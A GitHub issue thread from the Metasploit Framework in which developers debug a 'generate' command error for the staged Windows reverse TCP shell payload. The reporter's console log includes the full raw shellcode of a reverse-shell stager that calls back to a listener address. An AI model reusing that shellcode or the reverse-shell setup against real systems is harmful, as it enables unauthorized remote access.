### ISSUE TITLE
generate command triggers a stack trace on staged payloads

### ISSUE THREAD

**Issue by sempervictus** [rapid7/metasploit-framework#5531]
This payload seems to be misbehaving in an odd way - handlers can't generate stage for it, and generate command from msfconsole returns _wrong number of arguments (1 for 0)_ whereas pry-ing the module with the same DS generates a stage just fine.

Example:
```
(2015-06-13)16:00 (S:3 J:4)msf  payload(reverse_tcp) > use use payload/windows/shell/reverse_tcp
(2015-06-13)15:58 (S:3 J:4)msf  payload(reverse_tcp) > show options 

Module options (payload/windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

(2015-06-13)16:05 (S:3 J:4)msf  payload(reverse_tcp) > set LHOST 10.1.1.10
LHOST => 10.1.1.10
(2015-06-13)16:07 (S:3 J:4)msf  payload(reverse_tcp) > set LPORT 4321
LPORT => 4321
(2015-06-13)16:07 (S:3 J:4)msf  payload(reverse_tcp) > generate
[-] Payload generation failed: wrong number of arguments (1 for 0)
(2015-06-13)16:07 (S:3 J:4)msf  payload(reverse_tcp) > pry
[1] pry(#<#<Class:0x00000017c88860>>)> generate
=> "\xFC\xE8\x82\x00\x00\x00`\x89\xE51\xC0d\x8BP0\x8BR\f\x8BR\x14\x8Br(\x0F\xB7J&1\xFF\xAC<a|\x02, \xC1\xCF\r\x01\xC7\xE2\xF2RW\x8BR\x10\x8BJ<\x8BL\x11x\xE3H\x01\xD1Q\x8BY \x01\xD3\x8BI\x18\xE3:I\x8B4\x8B\x01\xD61\xFF\xAC\xC1\xCF\r\x01\xC78\xE0u\xF6\x03}\xF8;}$u\xE4X\x8BX$\x01\xD3f\x8B\fK\x8BX\x1C\x01\xD3\x8B\x04\x8B\x01\xD0\x89D$$[[aYZQ\xFF\xE0__Z\x8B\x12\xEB\x8D]h32\x00\x00hws2_ThLw&\a\xFF\xD5\xB8\x90\x01\x00\x00)\xC4TPh)\x80k\x00\xFF\xD5PPPP@P@Ph\xEA\x0F\xDF\xE0\xFF\xD5\x97j\x05h\n\x01\x01\nh\x02\x00\x10\xE1\x89\xE6j\x10VWh\x99\xA5ta\xFF\xD5\x85\xC0t\f\xFFN\bu\xECh\xF0\xB5\xA2V\xFF\xD5j\x00j\x04VWh\x02\xD9\xC8_\xFF\xD5\x8B6j@h\x00\x10\x00\x00Vj\x00hX\xA4S\xE5\xFF\xD5\x93Sj\x00VSWh\x02\xD9\xC8_\xFF\xD5\x01\xC3)\xC6u\xEE\xC3"
[2] pry(#<#<Class:0x00000017c88860>>)> exit
(2015-06-13)16:07 (S:3 J:4)msf  payload(reverse_tcp) > generate
[-] Payload generation failed: wrong number of arguments (1 for 0)
(2015-06-13)16:07 (S:3 J:4)msf  payload(reverse_tcp) > 
```

I'm under the gun for deliverables today, could someone track this and resolve or post their notes to this issue? If i had to guess i'd say we're hitting a method name collision somewhere or a runtime redefinition from a loaded module (Ruby level module).

**Comment by sempervictus** [comment]
Just took a quick look through the metasm payloads (i have some catching up to do here), and it appears we actually dont have the shell payload being generated - the connection ASM around it from the reverse/bind_tcp modules works as expected, we just dont have the remote bin execution and piping apparently. I'd guess we can insert a block of ASM here, but leaving this to @hmoore-r7  and @OJ to review for now.

**Comment by hmoore-r7** [comment]
Generate only creates the initial stage, but the stack trace should be fixed all the same.

**Comment by hmoore-r7** [comment]
This is just a bug in how ```stage_payload()``` is called, it doesn't take options anywhere.Nothing to do with ```generate()```

**Comment by OJ** [comment]
I got this one. I'm going to do a sweep across all the payloads and make sure we have a way of automating the creation of payloads so we know we don't break things in future. Thanks!

**Comment by OJ** [comment]
As in, I've the "longer term" fix :)

**Comment by hmoore-r7** [comment]
@OJ the original ticket description (generate) had nothing to do with this specific bug

**Comment by hmoore-r7** [comment]
So long as payloads are created with EncodedPayload and the Simple wrapper, they should work either way.
